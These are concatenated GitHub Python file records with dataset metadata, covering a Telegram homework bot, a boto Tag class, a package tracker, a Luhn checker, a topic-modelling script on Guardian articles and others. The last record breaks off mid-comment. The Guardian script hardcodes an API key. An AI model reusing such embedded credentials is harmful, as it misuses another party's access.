homework_name is None:\n raise KeyError('Домашняя работа не найдена')\n homework_status = homework.get('status')\n if not homework_status:\n raise KeyError('Статус домашней работы не найден')\n verdict = HOMEWORK_STATUSES.get(homework_status)\n if verdict is None:\n raise exceptions.MissingVerdictException(\n 'Вердикт по домашней работе не найден'\n )\n return f'Изменился статус проверки работы \"{homework_name}\". {verdict}'\n\n\ndef check_tokens():\n \"\"\"Проверяем наличие всех необходимых переменных окружения.\"\"\"\n return all([TELEGRAM_TOKEN, TELEGRAM_CHAT_ID, PRACTICUM_TOKEN])\n\n\ndef main():\n \"\"\"Основная логика работы бота.\"\"\"\n if not check_tokens():\n logger.critical('Не хватает переменных окружения!')\n raise SystemExit('Бот не запустился.')\n bot = telegram.Bot(token=TELEGRAM_TOKEN)\n current_timestamp = int(time.time())\n current_status = None\n last_message = None\n while True:\n try:\n response = get_api_answer(current_timestamp)\n homeworks = check_response(response)\n if len(homeworks) == 0:\n logger.info('Список проверенных домашек пуст.')\n continue\n homework_status = homeworks[0].get('status')\n message = parse_status(homeworks[0])\n if homework_status != current_status:\n current_status = homework_status\n logger.info(message)\n send_message(bot, message)\n logger.debug('Статус не изменился.')\n except exceptions.MessageNotSendedException as bot_error:\n logger.error(f'Сбой при отправке сообщения: {bot_error}')\n except Exception as error:\n message = f'Сбой в работе программы: {error}'\n logger.error(message)\n if last_message != message:\n send_message(bot, message)\n last_message = message\n finally:\n time.sleep(RETRY_TIME)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tratatatanya/homework_bot","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73629417991","text":"class Tag(object):\n \"\"\"\n A name/value tag on an AutoScalingGroup resource.\n\n :ivar key: The key of the tag.\n :ivar value: The value of the tag.\n :ivar propagate_at_launch: Boolean value which specifies whether the\n new tag will be applied to instances launched after the tag is created.\n :ivar resource_id: The name of the autoscaling group.\n :ivar resource_type: The only supported resource type at this time\n is \"auto-scaling-group\".\n \"\"\"\n\n def __init__(self, connection=None, key=None, value=None,\n propagate_at_launch=False, resource_id=None,\n resource_type='auto-scaling-group'):\n self.connection = connection\n self.key = key\n self.value = value\n self.propagate_at_launch = propagate_at_launch\n self.resource_id = resource_id\n self.resource_type = resource_type\n\n def __repr__(self):\n return 'Tag(%s=%s)' % (self.key, self.value)\n\n def startElement(self, name, attrs, connection):\n pass\n\n def endElement(self, name, value, connection):\n if name == 'Key':\n self.key = value\n elif name == 'Value':\n self.value = value\n elif name == 'PropagateAtLaunch':\n if value.lower() == 'true':\n self.propagate_at_launch = True\n else:\n self.propagate_at_launch = False\n elif name == 'ResourceId':\n self.resource_id = value\n elif name == 'ResourceType':\n self.resource_type = value\n\n def build_params(self, params, i):\n \"\"\"\n Populates a dictionary with the name/value pairs necessary\n to identify this Tag in a request.\n \"\"\"\n prefix = 'Tags.member.%d.' % i\n params[prefix + 'ResourceId'] = self.resource_id\n params[prefix + 'ResourceType'] = self.resource_type\n params[prefix + 'Key'] = self.key\n params[prefix + 'Value'] = self.value\n if self.propagate_at_launch:\n params[prefix + 'PropagateAtLaunch'] = 'true'\n else:\n params[prefix + 'PropagateAtLaunch'] = 'false'\n\n def delete(self):\n return self.connection.delete_tags([self])\n","repo_name":"boto/boto","sub_path":"boto/ec2/autoscale/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":6486,"dataset":"github-code","pt":"27"} +{"seq_id":"15204927129","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport os\n\n\ndef main():\n\tprint(\"Please enter your shipping carrier ('UPS' or 'USPS'): \")\n\tcarrier = raw_input().upper()\n\tprint(\"Now enter your tracking number: \")\n\ttrackingNumber = raw_input()\n\n\tdriver = webdriver.Chrome()\n\n\tif (carrier == 'UPS'):\n\t\tself.driver.get(\"http://www.ups.com/tracking/tracking.html\")\n\t\ttrackingNumID = \"trackNums\"\n\t\tsubmitXpath = \"//input[@value='Track']\"\n\t\tprogressXpath = \"//*[@id='collapse3']/h4\"\n\n\t\ttrackingFieldElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(trackingNumID))\n\t\tsubmitButtonElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(submitXpath))\n\n\t\ttrackingFieldElement.clear()\n\t\ttrackingFieldElement.send_keys(trackingNumber)\n\t\tsubmitButtonElement.click()\n\n\t\tWebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(progressXpath))\n\telif (carrier == 'USPS'):\n\t\tdriver.get(\"https://tools.usps.com/go/TrackConfirmAction!input.action\")\n\t\ttrackingNumID = \"tLabels\"\n\t\tsubmitXpath = \"//*[@id='trackNumFindBtn']\"\n\t\tprogressXpath = \"//*[@id='results-multi']/div[1]/div/div[3]/div[1]/h3\"\n\n\t\ttrackingFieldElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_id(trackingNumID))\n\t\tsubmitButtonElement = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(submitXpath))\n\n\t\ttrackingFieldElement.clear()\n\t\ttrackingFieldElement.send_keys(trackingNumber)\n\t\tsubmitButtonElement.click()\n\nmain()","repo_name":"J2Pi/PackTrack","sub_path":"tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42368923624","text":"\"\"\"\nPython script to check validity of credit card numbers\n\nGenerating check digit:\n\nLets assume you have a number given below:\n3 - 7 - 5 - 6 - 2 - 1 - 9 - 8 - 6 - 7 - X\nX is the check digit.\nNow starting from the right most digit i.e. check digit, double the every second digit.\nNew number will be:\n3 - 14 - 5 - 12 - 2 - 2 - 9 - 16 - 6 - 14 - X\nNow if double of a digit is more then 9, add the digits.\nSo the number will become:\n3 - 5 - 5 - 3 - 2 - 2 - 9 - 7 - 6 - 5 - X\nNow add all digits.\n47 + X\nMultiply the non-check part by 9.\n47 * 9 = 423\nUnit digit in the multiplication result is the check digit. X = 3\nValid number would be 37562198673.\n\"\"\"\nimport sys\n\n\ndef usage():\n msg = \"\"\"\n\n usage:\n python3 credit_card_validator credit_card_number\n\n example:\n python3 credit_card_validator 34678253793\n\n \"\"\"\n print(msg)\n\n\ndef get_cc_number():\n if len(sys.argv) < 2:\n usage()\n sys.exit(1)\n\n return sys.argv[1]\n\n\ndef sum_digits(digit):\n if digit < 10:\n return digit\n else:\n sum = (digit % 10) + (digit // 10)\n return sum\n\n\ndef validate(cc_num):\n # reverse the credit card number\n cc_num = cc_num[::-1]\n # convert to integer\n cc_num = [int(x) for x in cc_num]\n # double every second digit\n doubled_second_digit_list = list()\n digits = list(enumerate(cc_num, start=1))\n for index, digit in digits:\n if index % 2 == 0:\n doubled_second_digit_list.append(digit * 2)\n else:\n doubled_second_digit_list.append(digit)\n\n # add the digits if any number is more than 9\n doubled_second_digit_list = [sum_digits(x) for x in doubled_second_digit_list]\n # sum all digits\n sum_of_digits = sum(doubled_second_digit_list)\n if sum_of_digits % 10 == 0:\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n print(validate(get_cc_number()))\n","repo_name":"udhayprakash/Python_for_interview_preparation","sub_path":"Interview_Questions/validating_credit_cards_using_luhns_algorithm.py","file_name":"validating_credit_cards_using_luhns_algorithm.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"35550620891","text":"import asyncio\n\nasync def wr(writer):\n await writer.drain()\n writer.close()\n\nasync def handle(reader,writer):\n data = await reader.read(8096)\n writer.write(data[:8024])\n task = asyncio.ensure_future(wr(writer))\n \n\n\nloop = asyncio.get_event_loop()\ncoro = asyncio.start_server(handle, '127.0.0.1', 8888, loop=loop)\nserver = loop.run_until_complete(coro)\nloop.run_forever()\n\n","repo_name":"Shihab-Shahriar/Little-Projects","sub_path":"asyncio/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36071544778","text":"# model settings\nmodel = dict(\n type='ImageClassifier',\n backbone=dict(type='LeNet5', num_classes=10),\n neck=None,\n head=dict(\n type='ClsHead',\n loss=dict(type='CrossEntropyLoss', loss_weight=1.0),\n ))\n\n# dataset settings\ndataset_type = 'MNIST'\ndata_preprocessor = dict(mean=[33.46], std=[78.87], num_classes=10)\n\npipeline = [dict(type='Resize', scale=32), dict(type='PackInputs')]\n\ncommon_data_cfg = dict(\n type=dataset_type, data_prefix='data/mnist', pipeline=pipeline)\n\ntrain_dataloader = dict(\n batch_size=128,\n num_workers=2,\n dataset=dict(**common_data_cfg, test_mode=False),\n sampler=dict(type='DefaultSampler', shuffle=True),\n)\n\nval_dataloader = dict(\n batch_size=128,\n num_workers=2,\n dataset=dict(**common_data_cfg, test_mode=True),\n sampler=dict(type='DefaultSampler', shuffle=False),\n)\nval_evaluator = dict(type='Accuracy', topk=(1, ))\n\ntest_dataloader = val_dataloader\ntest_evaluator = val_evaluator\n\n# schedule settings\noptim_wrapper = dict(\n optimizer=dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001))\n\nparam_scheduler = dict(\n type='MultiStepLR', # learning policy, decay on several milestones.\n by_epoch=True, # update based on epoch.\n milestones=[15], # decay at the 15th epochs.\n gamma=0.1, # decay to 0.1 times.\n)\n\ntrain_cfg = dict(by_epoch=True, max_epochs=5, val_interval=1) # train 5 epochs\nval_cfg = dict()\ntest_cfg = dict()\n\n# runtime settings\ndefault_scope = 'mmpretrain'\n\ndefault_hooks = dict(\n # record the time of every iteration.\n timer=dict(type='IterTimerHook'),\n # print log every 150 iterations.\n logger=dict(type='LoggerHook', interval=150),\n # enable the parameter scheduler.\n param_scheduler=dict(type='ParamSchedulerHook'),\n # save checkpoint per epoch.\n checkpoint=dict(type='CheckpointHook', interval=1),\n # set sampler seed in distributed evrionment.\n sampler_seed=dict(type='DistSamplerSeedHook'),\n)\n\nenv_cfg = dict(\n # disable cudnn benchmark\n cudnn_benchmark=False,\n # set multi process parameters\n mp_cfg=dict(mp_start_method='fork', opencv_num_threads=0),\n # set distributed parameters\n dist_cfg=dict(backend='nccl'),\n)\n\nlog_level = 'INFO'\n\n# load from which checkpoint\nload_from = None\n\n# whether to resume the training of the checkpoint\nresume_from = None\n\n# NOTE: `auto_scale_lr` is for automatically scaling LR\n# based on the actual training batch size.\n# base_batch_size = (1 GPUs) x (128 samples per GPU)\nauto_scale_lr = dict(base_batch_size=128)\n","repo_name":"open-mmlab/mmpretrain","sub_path":"configs/lenet/lenet5_mnist.py","file_name":"lenet5_mnist.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":2849,"dataset":"github-code","pt":"27"} +{"seq_id":"7820021710","text":"import streamlit as st\nimport pandas as pd\n\n# Asumiendo que tus DataFrames ya están cargados en st.session_state\nif 'recetario' in st.session_state:\n # Asignando los DataFrames a variables\n recetario = st.session_state.recetario\n df_conteo = st.session_state.df_conteo\n df_costos = st.session_state.df_costos\n\n # Combinando los DataFrames\n df_combinado = recetario.merge(df_conteo, left_on='Nombre', right_on='Comidas').merge(df_costos, on='Ingrediente')\n\n # Añadiendo la columna de total de personas\n total_personas = st.number_input(\"Introduce el número de personas\", value=1, min_value=1)\n df_combinado['Total Personas'] = total_personas\n\n # Asegurando que las columnas sean del tipo correcto\n df_combinado[['Cantidad por persona', 'Total Personas', 'Costo', 'Veces que se come']] = df_combinado[['Cantidad por persona', 'Total Personas', 'Costo', 'Veces que se come']].astype(float)\n\n # Calculando el costo total por ingrediente\n df_combinado['Costo Total'] = (\n df_combinado['Cantidad por persona'] *\n df_combinado['Total Personas'] *\n df_combinado['Costo'] *\n df_combinado['Veces que se come']\n )\n\n # Mostrando el DataFrame resultante\n # st.dataframe(df_combinado, hide_index= True)\n\n # Calculando y mostrando el costo total, costo por comida, y costo por ingrediente\n costo_total = df_combinado['Costo Total'].sum()\n st.write(f\"Costo Total: ${round(costo_total,2)}\")\n\n costo_por_persona = costo_total / total_personas\n st.write(f\"Costo por persona: ${round(costo_por_persona,2)}\")\n\n costo_por_comida = df_combinado.groupby('Nombre')['Costo Total'].sum()\n st.write(\"Costo por Comida:\", round(costo_por_comida,2))\n\n costo_por_ingrediente = df_combinado.groupby('Ingrediente')['Costo Total'].sum()\n st.write(\"Costo por Ingrediente:\", costo_por_ingrediente)\n\nelse:\n st.error('No hay recetas')","repo_name":"lpetralli/stfood","sub_path":"pages/4_Cálculo_costos.py","file_name":"4_Cálculo_costos.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32604062222","text":"import random\r\nfrom HigherLowerGamedata import data\r\nfrom art import logo, vs\r\n\r\ndef check_ans(guess, follower_count_a, follower_count_b):\r\n if follower_count_a > follower_count_b:\r\n return guess == \"a\"\r\n else:\r\n return guess == \"b\"\r\n\r\ndef game():\r\n start_game = True\r\n score = 0\r\n x = random.randint(0, len(data))\r\n\r\n while start_game:\r\n\r\n name_a = data[x][\"name\"]\r\n country_a = data[x][\"country\"]\r\n description_a = data[x][\"description\"]\r\n follower_count_a = data[x][\"follower_count\"]\r\n print(f\"Compare A: {name_a}, {description_a}, from {country_a}\")\r\n\r\n print(vs)\r\n y = random.randint(0, len(data))\r\n name_b = data[y][\"name\"]\r\n country_b = data[y][\"country\"]\r\n description_b = data[y][\"description\"]\r\n follower_count_b = data[y][\"follower_count\"]\r\n print(f\"Against B: {name_b}, {description_b}, from {country_b}\")\r\n\r\n\r\n user_ans = input(\"Who has more followers? Type 'A' or 'B': \")\r\n\r\n is_correct = check_ans(user_ans, follower_count_a, follower_count_b)\r\n\r\n print(logo)\r\n if is_correct:\r\n score += 1\r\n print(f\"You are right! Your current score is {score}.\")\r\n else:\r\n start_game = False\r\n print(f\"Sorry, that's wrong. Your final score {score}\")\r\n x = y\r\n\r\ngame()","repo_name":"mansipurohit11/100-Days-Python","sub_path":"Higher Lower game/HigherLowerGame.py","file_name":"HigherLowerGame.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37554719399","text":"import json\r\nimport requests\r\nfrom os import makedirs\r\nfrom os.path import join, exists\r\nfrom datetime import date, timedelta\r\n \r\n# This creates two subdirectories called \"theguardian\" and \"collection\"\r\nARTICLES_DIR = join('theguardian', 'collection')\r\nmakedirs(ARTICLES_DIR, exist_ok=True)\r\n \r\n# Sample URL\r\n# http://content.guardianapis.com/search?from-date=2016-01-02&\r\n# to-date=2016-01-02&order-by=newest&show-fields=all&page-size=200\r\n# &api-key=your-api-key-goes-here\r\n \r\n# Change this for your API key:\r\nMY_API_KEY = 'f820d1dc-b679-45fb-aa15-443d1c44924f'\r\n \r\nAPI_ENDPOINT = 'http://content.guardianapis.com/search'\r\nmy_params = {\r\n 'from-date': \"\", # leave empty, change start_date / end_date variables instead\r\n 'to-date': \"\",\r\n 'order-by': \"newest\",\r\n 'show-fields': 'all',\r\n 'page-size': 200,\r\n 'api-key': MY_API_KEY\r\n}\r\n \r\n# day iteration from here:\r\n# http://stackoverflow.com/questions/7274267/print-all-day-dates-between-two-dates\r\n \r\n# Update these dates to suit your own needs.\r\nstart_date = date(2019, 4, 1)\r\nend_date = date(2019,10, 31)\r\n \r\ndayrange = range((end_date - start_date).days + 1)\r\nfor daycount in dayrange:\r\n dt = start_date + timedelta(days=daycount)\r\n datestr = dt.strftime('%Y-%m-%d')\r\n fname = join(ARTICLES_DIR, datestr + '.json')\r\n if not exists(fname):\r\n # then let's download it\r\n print(\"Downloading\", datestr)\r\n all_results = []\r\n my_params['from-date'] = datestr\r\n my_params['to-date'] = datestr\r\n current_page = 1\r\n total_pages = 1\r\n while current_page <= total_pages:\r\n print(\"...page\", current_page)\r\n my_params['page'] = current_page\r\n resp = requests.get(API_ENDPOINT, my_params)\r\n data = resp.json()\r\n all_results.extend(data['response']['results'])\r\n # if there is more than one page\r\n current_page += 1\r\n total_pages = data['response']['pages']\r\n \r\n with open(fname, 'w') as f:\r\n print(\"Writing to\", fname)\r\n \r\n # re-serialize it for pretty indentation\r\n f.write(json.dumps(all_results, indent=2))\r\n\r\n# Assignment 1. The collection\r\n# Import TheGuardian OpenApi\r\n\r\nimport json\r\nimport os\r\nfrom nltk.corpus import stopwords as sw\r\n\r\ndirectory_name = \"theguardian/collection/\"\r\n\r\nids = list()\r\ntexts = list()\r\nsections = list()\r\nfor filename in os.listdir(directory_name):\r\n if filename.endswith(\".json\"):\r\n with open(directory_name + filename) as json_file:\r\n data = json.load(json_file)\r\n for article in data:\r\n id = article['id']\r\n fields = article['fields']\r\n text = fields['bodyText'] if fields['bodyText'] else \"\"\r\n ids.append(id)\r\n texts.append(text)\r\n section = article['sectionId']\t# Id name each article gets by The Guardian\r\n sections.append(section) # Adding each item to a list as above \"sections = list()\"\r\n\r\nprint(\"Number of ids: %d\" % len(ids))\r\nprint(\"Number of texts: %d\" % len(texts))\r\n\r\n# Assignment 2. Pre-process and describe your collection\r\n \r\nsect = set(sections) # Changing the list into a set, meaning that no duplicates of the section titles will appear. It thereby creates a list where each unique name appears only once.\r\n# print(sect) # This could print the whole list of unique categories from the data set.\r\nlen(sect) # Counts the list of categories.\r\n\r\n# Unique count of each of the ID names with the count of each category. Showing each how many articles there are under the ID name\r\nimport numpy as np\r\nunique, counts = np.unique(sections, return_counts=True)\r\ndict(zip(unique, counts)) \r\n\r\n# How many characters there are combined, through all the data.\r\nall_lengths = list()\r\nfor text in texts:\r\n all_lengths.append(len(text))\r\nprint(\"Total sum of characters in dataset: %i\" % sum(all_lengths))\r\n\r\n# When performing a tokenization we can split up the strings and thereby count the total number of words. This method is without any tokenization tools.\r\nword_count = 0\r\nfor text in texts:\r\n words = text.split()\r\n word_count = word_count + len(words)\r\nword_count\r\n\r\n# To get the unique words we do a word split but now also extend the words.\r\nall_words = list()\r\nfor text in texts:\r\n words = text.split()\r\n all_words.extend(words)\r\nunique_words = set(all_words)\r\nunique_word_count = len(unique_words)\r\nprint(\"Unique word count: %i\" % unique_word_count)\r\n\r\n# The average word length is found by first finding all the individual word lengths, and then calculating the average from that.\r\ntotal_word_length = 0\r\nfor word in all_words:\r\n total_word_length = total_word_length + len(word)\r\naverage_word_length = total_word_length / len(all_words)\r\nprint(\"Average word length: %.6f\" % average_word_length)\r\n\r\n# To find out how many sentences there are in total, we first select the end of sentence marker for where a sentence should finish.\r\ndef end_of_sentence_marker(character):\r\n if character in ['.', '?', '!']: # In our case we made '.', '?', '!' our sentence splitters. \r\n return True\r\n else: \r\n return False\r\n\r\ndef split_sentences(texts):\r\n sentences = []\r\n start = 0\r\n for end, character in enumerate(text): # The enumerate adds a counter to an iterable and returns it in a form of enumerate object, that then can be used in loops.\r\n if end_of_sentence_marker(character):\r\n sentence = text[start: end + 1]\r\n sentences.append(sentence)\r\n start = end + 1\r\n return sentences\r\n\r\nall_sentences = list()\r\nfor text in texts:\r\n sentences = split_sentences(text)\r\n all_sentences.extend(sentences)\r\nsentence_count = len(all_sentences)\r\nsentence_count\r\n\r\n# The average number of words in a sentence\r\nwords_per_sentence = word_count / sentence_count\r\nprint(\"words per sentence: %.6f\" % words_per_sentence)\r\n\r\n# The following code shows a random sample of the unique words. This is to give an idea of what the words looks like. Here we see that some words are not typical words e.g. numbers ‘£22.99’ or abbreviations like ‘JCRA’ or that the words have punctuation marks around them and therefore appear as a different word than the same word without them: look” vs. look\r\nimport random\r\nrandom.sample(unique_words, 20)\r\n\r\nfrom nltk.tokenize import word_tokenize\r\n\r\n# Word tokenization of the documents and converting of big letters to small ones. \r\ntokens = list()\r\nfor text in texts:\r\n tokens_in_text = word_tokenize(text)\r\n for token in tokens_in_text:\r\n if token.isalpha():\r\n tokens.append(token.lower())\r\n\r\n# Creating a new list from the token list with stopwords removed\r\nstopWords = set(sw.words('english'))\r\n\r\nswwords = list()\r\nfor w in tokens:\r\n if w not in stopWords:\r\n swwords.append(w)\r\n\r\nprint(\"Str.split word count: %i\" % word_count) # Wordcount using str.split\r\nprint(\"Word count: %i\" % len(tokens)) # Wordcount using nltk tokenizer\r\nprint(\"Word count with stopwords removed: %i\" % len(swwords)) # Wordcount with stopwords removed using nltk tokenizer\r\nunique_tokens = set(tokens)\r\nunique_swwords = set(swwords)\r\nprint(\"Str.split unique word count: %i\" % unique_word_count) # Unique wordcount using str.split\r\nprint(\"Unique word count: %i\" % len(unique_tokens)) # Unique wordcount using nltk tokenizer\r\nprint(\"Unique word count with stopwords removed: %i\" % len(unique_swwords)) # Unique wordcount with stopwords removed using nltk tokenizer\r\n\r\nimport random\r\nrandom.sample(unique_swwords, 20)\r\n\r\n# Here we make a subset of the entire dataset. 2 lists are being made to include both the section id´s: “sport” & “football” and the indexes for the original list. \r\nidxes = []\r\nsubtexts = []\r\nfor i, section in enumerate(sections):\r\n if section in ['sport','football']:\r\n idxes.append(i)\r\n subtexts.append(texts[i])\r\nlen(idxes) # Test to see how many files there are under the sections “sport” & “football” respectively. These numbers can be compared to the list of all sections, where the total number of articles per section can be observed. \r\n\r\n# Assignment 3. Select articles using a query\r\n# To create the document-term matrix for the dataset we need to use CountVectorizer, \r\n# which can be imported with sklearn. To transform our data we must also use model_vect.fit_transform.\r\n# When running to code, it tells us that there are 2.395.815 elements in our document matrix \r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom nltk.corpus import stopwords as sw\r\nmodel_vect = CountVectorizer(stop_words= stopWords, token_pattern=r'[a-zA-Z\\-][a-zA-Z\\-]{2,}')\r\ndata_vect = model_vect.fit_transform(subtexts)\r\nprint('Shape: (%i, %i)' % data_vect.shape) # This shows how many documents 6808 x how many terms 87615 there are in our subset. We changed the initial dataset from only containing articles from starting on the 1st of September to ending on the 30th of October, to starting on the 1st of April to ending on the 30th of October. We did so because we wanted to show our results on a larger datascale. \r\ndata_vect\r\n\r\n# In this line of code we demonstrate how we're able to find the index placement of the 10 most used\r\n# words in our documents. When using. A1 we're able to present results in an array, which\r\n# can be described as a line of numbers. The [:10] tells that we want it as a top 10. We can change this\r\n# number if we want to show more or fewer results eg. 20 or 5. \r\ncounts = data_vect.sum(axis=0).A1\r\ntop_idxs = (-counts).argsort()[:10]\r\ntop_idxs\r\n\r\n# Here we use inverted_vocabulary to assign the actual words belonging to the top-10 indexes in the sub-sets.\r\ninverted_vocabulary = dict([(idx, word) for word, idx in model_vect.vocabulary_.items()])\r\ntop_words = [inverted_vocabulary[idx] for idx in top_idxs]\r\nprint(\"Top words in subset: %s\" % top_words)\r\n\r\n# Frequency/amount of times the words are being used in the entire dataset. So we can compare it to the most used word in the subsets.\r\nfrom nltk.probability import FreqDist\r\nfdist = FreqDist(swwords)\r\nfdist.most_common(30)\r\n\r\n# This line is not important in itself, but it creates a submatrix that will be used later on.\r\nimport random\r\nsome_row_idxs = random.sample(range(0,len(subtexts)), 10)\r\nprint(\"Selection: (%s x %s)\" % (some_row_idxs, top_idxs))\r\nsub_matrix = data_vect[some_row_idxs, :][:, top_idxs].todense()\r\nsub_matrix\r\n\r\n# The code here transforms the tf-idf model.\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nmodel_tfidf = TfidfTransformer()\r\ndata_tfidf = model_tfidf.fit_transform(data_vect)\r\n\r\n# The freqs function helps us sort the top 10 words.\r\nfreqs = data_tfidf.mean(axis=0).A1\r\ntop_idxs = (-freqs).argsort()[:10].tolist()\r\ntop_words = [inverted_vocabulary[idx] for idx in top_idxs]\r\n(top_idxs, top_words)\r\n\r\n# Now we can use the submatrix and the transformed tf-idf, to create a scheme of the top 10 most used words and their weight in 10 random documents.\r\nimport pandas as pd\r\nsub_matrix = data_tfidf[some_row_idxs, :][:,top_idxs].todense()\r\ndf = pd.DataFrame(columns=top_words, index=some_row_idxs, data=sub_matrix)\r\ndf\r\n\r\n# Query terms that we think we will find in our subsets. \r\nterms = ['tottenham', 'hotspurs', 'hotspur', 'spurs', 'stadium', 'new', 'home']\r\nterms\r\n\r\n# The count of each term in the subsets, how many times it is used. \r\nterm_idxs = [model_vect.vocabulary_.get(term) for term in terms]\r\nterm_counts = [counts[idx] for idx in term_idxs]\r\nterm_counts\r\n\r\n# Calculate the term weights \r\nidfs = model_tfidf.idf_\r\nterm_idfs = [idfs[idx] for idx in term_idxs]\r\nterm_idfs\r\n\r\n# Creates a matrix for the query words and their weight in the chosen subsets\r\ndfi = pd.DataFrame(columns=['count', 'idf'], index=terms, data=zip(term_counts,term_idfs))\r\ndfi\r\n\r\n# Assignment 4. Model and visualize the topics in your subset\r\n# 4 components\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\nmodel_lda = LatentDirichletAllocation(n_components=6, random_state=0)\r\ndata_lda = model_lda.fit_transform(data_vect)\r\nnp.shape(data_lda)\r\n\r\n# Here we show the top 20 words and their individual weight related to each of the 4 components \r\nfor i, term_weights in enumerate(model_lda.components_):\r\n top_idxs = (-term_weights).argsort()[:20]\r\n top_words = [\"%s (%.3f)\" % (model_vect.get_feature_names()[idx], term_weights[idx]) for idx in top_idxs]\r\n print(\"Topic %d: %s\" % (i, \", \".join(top_words)))\r\n \r\n# A small matrix to illustrate which document is the most likely to match one of the topics that was found in the code above. \r\ntopic_names = [\"Topic\" + str(i) for i in range(model_lda.n_components)]\r\ndoc_names = [\"Doc\" + str(i) for i in range(len(subtexts))]\r\ndf = pd.DataFrame(data=np.round(data_lda, 2), columns=topic_names, index=doc_names).head(10)\r\ndf.style.applymap(lambda val: \"background: red\" if val>.3 else '', )\r\n\r\n# In this code we’re able to take a random document and show its index placement, topic vector, which of the 4 components it relates the most to. Lastly we’re shown the entire document text \r\ndoc_idx = random.randint(0,len(subtexts)-1)\r\nprint('Doc idx: %d' % doc_idx)\r\ntopics = data_lda[doc_idx]\r\nprint('Topic vector: %s' % topics)\r\nvote = np.argsort(-topics)[0]\r\nprint('Topic vote: %i' % vote)\r\nsubtexts[doc_idx]\r\n\r\n# Word Cloud\r\nfrom wordcloud import WordCloud\r\nimport matplotlib.pyplot as plt\r\n\r\nfor i, term_weights in enumerate(model_lda.components_):\r\n top_idxs = (-term_weights).argsort()[:20]\r\n top_words = [model_vect.get_feature_names()[idx] for idx in top_idxs]\r\n word_freqs = dict(zip(top_words, term_weights[top_idxs]))\r\n wc = WordCloud(background_color=\"white\",width=200,height=200, max_words=20).generate_from_frequencies(word_freqs)\r\n plt.subplot(2, 3, i+1)\r\n plt.imshow(wc)\r\n\r\n# The following code compares each of the topics from earlier to ALL texts in our subset and shows which document is most connected to each topic. \r\ndf = pd.DataFrame(data=data_lda, columns=topic_names)\r\ndf['class'] = idxes\r\ndf = df.groupby('class').mean().round(2)\r\ndf.style.applymap(lambda val: \"background: red\" if val>.5 else '', )\r\n\r\n# These lines make unique words from our subsets, where stopwords, small letters, and tokenizer are used. This has been done to get plot frequency distribution and Zipf’s law graph. \r\nsubtokens = list()\r\nfor subtext in subtexts:\r\n tokens_in_subtext = word_tokenize(subtext)\r\n for subtoken in tokens_in_subtext:\r\n if subtoken.isalpha():\r\n subtokens.append(subtoken.lower())\r\nstopWords = set(sw.words('english'))\r\nsubwords = list()\r\nfor w in subtokens:\r\n if w not in stopWords:\r\n subwords.append(w)\r\n\r\n# Plot frequency distribution\r\nfrom nltk.probability import FreqDist\r\nfdist = FreqDist(subwords)\r\nfdist.most_common(30)\r\nimport matplotlib.pyplot as plt\r\nfdist.plot(30,cumulative=False)\r\nplt.show()\r\n\r\n# Zipf’s law\r\nranks = range(1, len(fdist) + 1)\r\nfreqs = list(fdist.values())\r\nfreqs.sort(reverse = True)\r\nplt.plot(ranks, freqs, '-')\r\nplt.xscale('log')\r\nplt.yscale('log')\r\nplt.show()\r\n\r\n# Here we try to answer our research question: With which topics was the football club Tottenham mentioned? \r\n# We have the previously selected and used terms from assignment 3. First, we combine the 7 query words.\r\nquery = \" \".join(terms)\r\nquery\r\n\r\n# Then changing the query in to a sparse matrix with 1 row. \r\nquery_vect_counts = model_vect.transform([query])\r\nquery_vect = model_tfidf.transform(query_vect_counts)\r\nquery_vect\r\n\r\n# We then compare all terms with our research question, where the percentage shows how well they fit with our query.\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nsims = cosine_similarity(query_vect, data_tfidf)\r\nsims\r\n\r\n# Here we sort the documents by how well they fit our query. The most likely is at the top.\r\nsims_sorted_idx = (-sims).argsort()\r\nsims_sorted_idx\r\n\r\n# The document that fits our query best is shown here and you get the whole article. The article is: https://www.theguardian.com/football/blog/2019/apr/03/tottenham-new-stadium-spurs-numbers-game-crystal-palace which is about the new stadium that Tottenham hotspurs got in March. \r\nsubtexts[sims_sorted_idx[0,0]]\r\n \r\n# Second query using only “tottenham” and “spurs” to find articles only related to these terms.\r\nTotSputerms = ['tottenham', 'spurs']\r\n\r\n# In these lines we make a vectorizer model of how many times tottenham and spurs are mentioned (frequency), and what their idf is. The two numbers together lets us calculate the weight of the terms. \r\ntotterm_idxs = [model_vect.vocabulary_.get(term) for term in TotSputerms]\r\ntotterm_counts = [counts[idx] for idx in totterm_idxs]\r\nTotidfs = model_tfidf.idf_\r\nTotterm_idfs = [Totidfs[idx] for idx in totterm_idxs]\r\ntotdf = pd.DataFrame(columns=['count', 'idf'], index=TotSputerms, data=zip(totterm_counts,Totterm_idfs))\r\ntotdf\r\n \r\n# We join the terms tottenham and spurs into a 